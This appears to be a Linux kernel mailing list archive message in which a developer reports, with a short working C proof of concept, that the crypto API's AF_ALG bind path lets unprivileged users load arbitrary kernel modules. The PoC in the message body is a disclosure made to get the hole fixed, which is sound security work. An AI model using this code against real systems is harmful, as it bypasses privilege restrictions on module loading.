public inbox for linux-kernel@vger.kernel.org
 help / color / mirror / Atom feed
From: Mathias Krause <minipli@googlemail.com>
To: Kees Cook <keescook@google.com>
Cc: "Serge E. Hallyn" <serge@hallyn.com>,
	"Eric W. Biederman" <ebiederm@xmission.com>,
	LKML <linux-kernel@vger.kernel.org>,
	Serge Hallyn <serge.hallyn@canonical.com>,
	Brad Spengler <spender@grsecurity.net>,
	Al Viro <viro@zeniv.linux.org.uk>, Eric Paris <eparis@redhat.com>,
	Rusty Russell <rusty@rustcorp.com.au>,
	PaX Team <pageexec@freemail.hu>,
	Herbert Xu <herbert@gondor.hengli.com.au>,
	"David S. Miller" <davem@davemloft.net>
Subject: Re: user ns: arbitrary module loading
Date: Mon, 4 Mar 2013 09:29:59 +0100	[thread overview]
Message-ID: <20130304082959.GA22087@r00tworld.net> (raw)
In-Reply-To: <CAGXu5jKphNv9+wYE1GwfXKXDdzeWB_AtiqxT0e2PEzqCXNPkfQ@mail.gmail.com>

On Sun, Mar 03, 2013 at 09:48:50AM -0800, Kees Cook wrote:
> Several subsystems already have an implicit subsystem restriction
> because they load with aliases. (e.g. binfmt-XXXX, net-pf=NNN,
> snd-card-NNN, FOO-iosched, etc). This isn't the case for filesystems
> and a few others, unfortunately:
> 
> $ git grep 'request_module("%.*s"' | grep -vi prefix
> crypto/api.c:           request_module("%s", name);
> 
> [...]
> 
> Several of these come from hardcoded values, though (e.g. crypto, chipreg).

Well, crypto does not. Try the code snippet below on a system with
CONFIG_CRYPTO_USER_API=y. It'll abuse the above request_module() call
to load any module the user requests -- iregardless of being contained
in a user ns or not.

---8<---
/* Loading arbitrary modules using crypto api since v2.6.38
 *
 * - minipli
 */
#include <linux/if_alg.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#ifndef AF_ALG
#define AF_ALG 38
#endif


int main(int argc, char **argv) {
	struct sockaddr_alg sa_alg = {
		.salg_family = AF_ALG,
		.salg_type = "hash",
	};
	int sock;

	if (argc != 2) {
		printf("usage: %s MODULE_NAME\n", argv[0]);
		exit(1);
	}

	sock = socket(AF_ALG, SOCK_SEQPACKET, 0);
	if (sock < 0) {
		perror("socket(AF_ALG)");
		exit(1);
	}

	strncpy((char *) sa_alg.salg_name, argv[1], sizeof(sa_alg.salg_name));
	bind(sock, (struct sockaddr *) &sa_alg, sizeof(sa_alg));
	close(sock);

	return 0;
}
--->8---

If people care about unprivileged users not being able to load arbitrary
modules, could someone please fix this in crypto API, then? Herbert?


Thanks,
Mathias

  reply	other threads:[~2013-03-04  8:39 UTC|newest]

Thread overview: 25+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2013-03-02  1:22 user ns: arbitrary module loading Kees Cook
2013-03-03  0:57 ` Serge E. Hallyn
2013-03-03  1:18   ` Kees Cook
2013-03-03  3:56     ` Serge E. Hallyn
2013-03-03 10:14       ` [RFC][PATCH] fs: Limit sys_mount to only loading filesystem modules Eric W. Biederman
2013-03-03 15:29         ` Serge E. Hallyn
2013-03-03 18:30         ` Kees Cook
2013-03-03 17:48       ` user ns: arbitrary module loading Kees Cook
2013-03-04  8:29         ` Mathias Krause [this message]
2013-03-04 16:46           ` Kees Cook
2013-03-04 18:21             ` Eric W. Biederman
2013-03-04 18:41               ` Kees Cook
2013-03-03  4:12   ` Eric W. Biederman
2013-03-03 18:18     ` Kees Cook
2013-03-03 21:58       ` Eric W. Biederman
2013-03-04  2:35         ` Kees Cook
2013-03-04  3:54           ` Eric W. Biederman
2013-03-04  7:48           ` [PATCH 0/2] userns bug fixes for v3.9-rc2 for review Eric W. Biederman
2013-03-04  7:50             ` [PATCH 1/2] userns: Stop oopsing in key_change_session_keyring Eric W. Biederman
2013-03-04  7:51             ` [PATCH 2/2] fs: Limit sys_mount to only request filesystem modules Eric W. Biederman
2013-03-04 17:36               ` Vasily Kulikov
2013-03-04 18:36                 ` Eric W. Biederman
2013-03-05 19:06               ` Kay Sievers
2013-03-05 19:32                 ` Kees Cook
2013-03-05 23:24                 ` Eric W. Biederman

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=20130304082959.GA22087@r00tworld.net \
    --to=minipli@googlemail.com \
    --cc=davem@davemloft.net \
    --cc=ebiederm@xmission.com \
    --cc=eparis@redhat.com \
    --cc=herbert@gondor.hengli.com.au \
    --cc=keescook@google.com \
    --cc=linux-kernel@vger.kernel.org \
    --cc=pageexec@freemail.hu \
    --cc=rusty@rustcorp.com.au \
    --cc=serge.hallyn@canonical.com \
    --cc=serge@hallyn.com \
    --cc=spender@grsecurity.net \
    --cc=viro@zeniv.linux.org.uk \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body. 
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox